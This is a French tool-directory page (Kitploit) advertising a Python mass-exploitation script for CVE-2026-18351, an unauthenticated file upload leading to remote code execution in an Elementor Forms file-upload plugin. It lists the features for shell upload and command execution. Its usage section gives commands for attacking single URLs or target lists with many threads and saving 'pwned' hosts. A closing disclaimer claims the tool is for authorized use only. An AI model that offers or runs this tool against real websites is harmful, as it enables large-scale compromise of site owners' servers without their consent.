Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-18351 — Outil d'exploitation de masse pour CVE-2026-18351, un téléversement de fichier arbitraire non authentifié menant à une RCE dans Elementor Forms <= 1.6.0, avec sondage passif, téléversement de shell et exécution de commandes. | Kitploit
Outils/GitHubGitHub/johenlastgen-jlg/cve-2026-18351
Scanners de VulnérabilitésExploitationScripting et AutomatisationExploitation d'Applications WebSécurité WebTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHub
johenlastgen-jlg/cve-2026-18351

CVE-2026-18351

Outil d'exploitation de masse pour CVE-2026-18351, un téléversement de fichier arbitraire non authentifié menant à une RCE dans Elementor Forms <= 1.6.0, avec sondage passif, téléversement de shell et exécution de commandes.

Voir le dépôt
il y a 16h 29mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-18351

Outil d'exploitation de masse pour CVE-2026-18351 — Téléversement de fichier arbitraire non authentifié → RCE dans Drag and Drop File Upload for Elementor Forms <= 1.6.0.

crédit johenlastgen | telegram @johenlastgen | chaîne @jlgnetworkredirect


Fonctionnalités

  • Sonde de vulnérabilité passive (sans téléversement)
  • Mode d'exploitation complet avec téléversement de shell et confirmation RCE
  • Prise en charge d'une cible unique et de cibles multiples
  • Prise en charge du multi-thread
  • Exécution de commandes configurable
  • Fichiers de sortie : journal complet, vulnérables uniquement et compromis uniquement
  • Configuration du délai d'expiration des requêtes

Prérequis

Aucune dépendance externe — utilise uniquement la bibliothèque standard Python.

root@kitploit:~
python3 --version  # 3.6+

Utilisation

root@kitploit:~
# Single target — passive check only (no upload)
python3 mass.py --url http://target.com --check

# Single target — exploit with default command (id)
python3 mass.py --url http://target.com --cmd id

# Single target — exploit with custom command
python3 mass.py --url http://target.com --cmd whoami

# Mass targets — passive check
python3 mass.py --list targets.txt --threads 50 --check

# Mass targets — exploit
python3 mass.py --list targets.txt --threads 50 --cmd id

# Mass targets — exploit with timeout tuning
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami

# Save full log
python3 mass.py --list targets.txt --output results.txt

# Save only vulnerable targets
python3 mass.py --list targets.txt --output-vuln vuln.txt

# Save only confirmed RCE targets
python3 mass.py --list targets.txt --output-pwned pwned.txt

# Combined output
python3 mass.py \
  --list targets.txt \
  --threads 50 \
  --cmd id \
  --output results.txt \
  --output-vuln vuln.txt \
  --output-pwned pwned.txt

Options

OptionDescription
--urlURL de la cible unique
--list FILEFichier contenant les URL des cibles (une par ligne)
--checkSonde passive uniquement — aucun téléversement de fichier
--cmd CMDCommande à exécuter sur le shell (par défaut : id)
--threads NNombre de threads simultanés (par défaut : 20)
--timeout NDélai d'expiration par requête en secondes (par défaut : 10)
--output FILEEnregistrer le journal complet dans un fichier
--output-vuln FILEEnregistrer uniquement les URL des cibles vulnérables dans un fichier
--output-pwned FILEEnregistrer uniquement les cibles RCE confirmées dans un fichier

États de sortie

ÉtatSignification
PWNEDShell téléversé et RCE confirmé
VULN-NO-EXECTéléversement accepté mais exécution du shell échouée
PATCHEDTéléversement rejeté ou nonce introuvable
ERRORÉchec réseau ou d'analyse

Format de targets.txt

Une URL par ligne. Les lignes commençant par # sont ignorées.

root@kitploit:~
http://target1.com
https://target2.com
# this line is ignored
http://target3.com

Avertissement

Ce projet est fourni uniquement pour des évaluations de sécurité autorisées, la recherche en sécurité défensive et la validation de vulnérabilités.

En utilisant ce logiciel, vous confirmez disposer d'une autorisation explicite pour évaluer les systèmes cibles. L'accès non autorisé aux systèmes informatiques est interdit et peut enfreindre les lois applicables.

L'auteur et les contributeurs n'encouragent ni ne cautionnent l'utilisation non autorisée de ce projet et n'assument aucune responsabilité pour tout usage abusif, dommage ou conséquence juridique résultant de son utilisation.


Auteur

JohenLastGen — JLG NETWORK

Télécharger l’outil